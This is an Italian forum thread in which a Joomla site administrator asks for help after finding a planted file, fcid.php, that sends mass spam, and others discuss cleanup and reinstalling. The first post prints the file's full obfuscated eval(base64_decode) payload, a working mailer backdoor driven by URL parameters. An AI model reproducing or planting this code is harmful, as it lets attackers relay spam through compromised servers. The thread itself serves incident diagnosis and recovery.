Spammig da sito Joomla 1.5.15

[vendra]

Salve a tutti,
sul sito che gestisco ho riscontrato dei possibili problemi di spamming.
Nell'account creato al momento dell'iscrizione all'ISP mi sono trovato circa 13.000 email contenenti come oggetto "Mail delivery failed: returning message to sender" oppure "Mail failure - no recipient addresses".
Nel corpo della e-mail, soprattutto quelle con oggetto "Mail failure - no recipient addresses"m trovo un campo con etichetta "X-PHP-Script:

Codice: [Seleziona]

www.miodominio.it/includes/fcid.php for 95.32.202.0".
Se edito il file fcid.php trovo una sola riga con la seguente funzione php "<?php eval(base64_decode('JHRleHQgPSBzdHJfcmVwbGFjZSgnajEnLCcgJyAsJF9HRVRbInRleHQiXSk7IA0KJHRleHQgPSBzdHJfcmVwbGFjZSgnajInLCJcciIgLCR0ZXh0KTsgDQokdGV4dCA9IHN0cl9yZXBsYWNlKCdqMycsIlxuIiAsJHRleHQpOyANCiRmcm9tID0gc3RyX3JlcGxhY2UoJ2oxJywnICcgLCRfR0VUWyJvdGtvZ28iXSk7IA0KJHRvID0gJF9HRVRbJ2VtYWlsJ107IA0KJHN1YmogPSBzdHJfcmVwbGFjZSgnajEnLCcgJyAsJF9HRVRbInRlbWEiXSk7IA0KJGJvZHkgPSAiJHRleHQiOyANCiRmcm9tPSJGcm9tOiAkZnJvbVxuUmVwbHktVG86ICRmcm9tXG5YLVByaW9yaXR5OiAxXG5Db250ZW50LVR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD1cImtvaTgtclwiXG5Db250ZW50LVRyYW5zZmVyLUVuY29kaW5nOiA4Yml0IjsgIA0KJGZyb209Y29udmVydF9jeXJfc3RyaW5nKCRmcm9tLCJ3IiwiayIpOyAgDQokdG89Y29udmVydF9jeXJfc3RyaW5nKCR0bywidyIsImsiKTsgIA0KJHN1Ymo9Y29udmVydF9jeXJfc3RyaW5nKCRzdWJqLCJ3IiwiayIpOyAgDQokYm9keT1jb252ZXJ0X2N5cl9zdHJpbmcoJGJvZHksInciLCJrIik7ICANCm1haWwoJHRvLCRzdWJqLCRib2R5LCRmcm9tKTsgIA==')); ?>"Il file php indicato ha data di creazione 01/01/1970 e non è l'unico file con il contenuto di cui sopra.
Ho cercato risposte su vari forum ma non ho trovato nulla che potesse aiutarmi (ad eccezione di un malworm chiamato c99MadShell che, a quanto pare colpisce anche Xoops e Joomla.
Qualcuno si è imbattuto in questo problema oppure ne è a conoscenza.
Grazie a quanti mi vorranno aiutare.

Mauro

[56francesco]

usa la tag code per questa monnezza, anzi evita di inserirla altrove,
e comunque non capisco cosa c'entri joomla,  se lo avesse spedito con altro software la probabile soluzione non cambiava mica..

e poi è una segnalazione o che?

[vendra]

chiedo scusa per aver inserito il codice "monnezza", la cosa non era voluta.
Dato che non scrivo spesso nei forum probabilmente manco della necessaria abilità ... o conescenza.
In merito all'apertura della discussione si tratta "in primis" di una richiesta d'aiuto e, in seconda battuta, di una segnalazione.
Resta comunque il fatto che quanto segnalato è accaduto su un sito creato con Joomla ed è per questo che "mi sono permesso" di scrivere su questo forum.
Grazie ancora a quanti mi vorranno aiutare.

Mauro

[maicolstaip]

Ciao vendra,
mi è capitata una cosa simile su un server condiviso, sono stati infettati siti in joomla e in html puro.
Credo che il problema sia stato il server e non i miei siti in particolare (I gestori non hanno mai fatto luce sul problema)
Sono entrati ad un livello superiore e quindi hanno avuto accesso a tutti i siti che risiedevano sul server in questione.

Per risolvere ho ripulito tutti i files index.php che avevo nel sito ma se hai un backup fai prima. 

[vendra]

Ciao,
ho provato a fare la restore di un backup su un altro server, purtroppo anche il backup più vecchio ha i files "infetti" già presenti.
Ho osservato, però, che il database sembra integro, quindi pensavo di:
1) mettere il sito offline
2) fare un full backup
3) cancellare tutto il sito
4) eseguire un'installazione ex novo di Joomla
5) installare i componenti/moduli aggiuntivi
6) eseguire, da PhpMyAdmin la restore del solo database
7) eseguire i test del caso e rimettere in linea il sito

Che ne pensi/pensate ?

Mauro